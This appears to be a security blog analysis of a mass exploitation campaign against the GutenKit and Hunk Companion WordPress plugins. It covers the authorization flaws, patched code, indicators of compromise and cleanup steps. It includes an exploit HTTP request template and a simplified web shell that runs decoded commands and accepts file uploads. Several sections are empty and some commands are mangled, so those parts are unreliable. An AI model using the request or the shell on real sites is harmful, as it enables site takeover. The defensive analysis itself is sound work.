Critical analysis of a mass WordPress plugin exploit. Attackers use auth bypass flaws in GutenKit & Hunk Companion to install backdoors and achieve full site control.

Continue reading
A coordinated mass exploitation campaign is actively targeting critical privilege escalation vulnerabilities in the GutenKit and Hunk Companion WordPress plugins. This campaign leverages authentication bypass flaws to achieve unauthenticated remote code execution through arbitrary plugin installation. The ongoing attacks represent a systemic threat to WordPress security, with threat actors establishing persistent backdoors and maintaining redundant access mechanisms across compromised infrastructures.
WordPress provides a REST API infrastructure that allows plugins to register custom endpoints. Proper security implementation requires two distinct validation layers:
The vulnerabilities arise from conflating nonce verification with proper authorization, creating a fundamental design flaw in the affected plugins' security model.
Affected Component: `/wp-json/gutenkit/v1/install-active-plugin`
Vulnerable Code Pattern: ```php function gutenkit_install_active_plugin() { // Security check relying solely on nonce verification check_ajax_referer('gutenkit_ajax_nonce', 'nonce');
// No capability check before privileged operation $plugin_slug = $_POST['slug']; $result = $this->install_plugin($plugin_slug); // ... installation and activation logic } ```
Root Cause: The endpoint performed nonce verification via `check_ajax_referer()` but completely omitted the required capability check (`current_user_can('install_plugins')`). Nonces in WordPress are designed exclusively for CSRF protection and can be harvested or predicted, making them insufficient for authorization enforcement.
Impact: Any unauthenticated attacker with knowledge of a valid nonce or the ability to bypass nonce verification could trigger plugin installation and activation procedures.
Affected Component: `/wp-json/hc/v1/themehunk-import`
Vulnerability Evolution:
Initial Flaw (CVE-2024-9707): The plugin's demo import functionality contained identical authorization deficiencies, allowing unauthenticated plugin installation through insufficient nonce checks.
Incomplete Patch (Version 1.8.5): The initial fix attempted to address the vulnerability but contained logical flaws that allowed bypass techniques, leading to CVE-2024-11972.
Final Resolution (Version 1.9.0): The comprehensive patch implemented proper capability checks: ```php function themehunk_import_install_plugin() { // Proper authorization check added if (!current_user_can('install_plugins')) { return new WP_Error('unauthorized', 'Insufficient permissions'); }
// Nonce verification for CSRF protection if (!wp_verify_nonce($_POST['nonce'], 'hc_ajax_nonce')) { return new WP_Error('invalid_nonce', 'Security check failed'); }
// Proceed with plugin installation // ... secure implementation } ```
Threat actors employ large-scale scanning methodologies to identify vulnerable installations:
HTTP Request Template for GutenKit Exploitation: ```http POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1 Host: TARGET_HOST Content-Type: application/x-www-form-urlencoded Content-Length: 132 Connection: close
action=install-plugin&slug=wp-query-console&nonce=EXTRACTED_NONCE ```
Attack Workflow:
The primary persistence mechanism involves deploying a custom malicious plugin, typically distributed as `up.zip`, which contains sophisticated obfuscation:
Malicious Plugin Architecture: ``` /wp-content/plugins/up/ ├── up.php (Main loader with heavily obfuscated code) ├── includes/ │ └── core.php (Web shell functionality) └── vendor/ └── autoload.php (Dependency loader) ```
Obfuscation Techniques Observed:
Web Shell Capabilities: ```php // Simplified representation of backdoor functionality if (isset($_REQUEST['cmd']) && md5($_REQUEST['key']) === $secret_hash) { system(base64_decode($_REQUEST['cmd'])); }
if (isset($_FILES['backdoor'])) { move_uploaded_file($_FILES['backdoor']['tmp_name'], $_FILES['backdoor']['name']); } ```
Secondary Payload Deployment: Attackers consistently install the known vulnerable `wp-query-console` plugin as a fallback RCE mechanism. This plugin contains unauthenticated SQLi-to-RCE vulnerabilities that provide guaranteed access even if primary backdoors are discovered.
Lateral Movement Patterns:
Primary Malicious Components:
Secondary Implants:
HTTP Request Patterns: ```log
"POST /wp-json/gutenkit/v1/install-active-plugin" 200 "POST /wp-json/hc/v1/themehunk-import" 200
"GET /wp-content/plugins/up/up.php?cmd=Y21kLmV4ZQ==" 200 "POST /wp-content/plugins/wp-query-console/includes/query-console.php" 200 ```
Command and Control Signatures:
Database Modifications:
Error Log Patterns:
Containment Procedures:
Forensic Data Collection: ```bash
grep -r "gutenkit\|themehunk-import" /var/log/apache2/ find /wp-content/plugins/ -name ".php" -mtime -7 -exec ls -la {} \; mysql -e "SELECT FROM wp_options WHERE option_name='active_plugins'" ```
Patch Verification:
// Verification method for proper patching
function verify_authorization_fix($plugin_file) {
$content = file_get_contents($plugin_file);
return (strpos($content, "current_user_can('install_plugins')") !== false);
}Systematic Cleanup Process:
-- Remove unauthorized admin users
DELETE FROM wp_users WHERE user_login IN ('admin1', 'setupuser', 'tempadmin');
-- Clean compromised options
UPDATE wp_options
SET option_value = 'clean_value'
WHERE option_name = 'active_plugins'
AND option_value LIKE '%malicious-plugin%';Security Control Enhancement:
Continuous Monitoring:
WordPress Plugin Security Standards:

148 malicious npm packages masquerading as student proxy and school Wi-Fi bypass tools. Rather than compromising developers during installation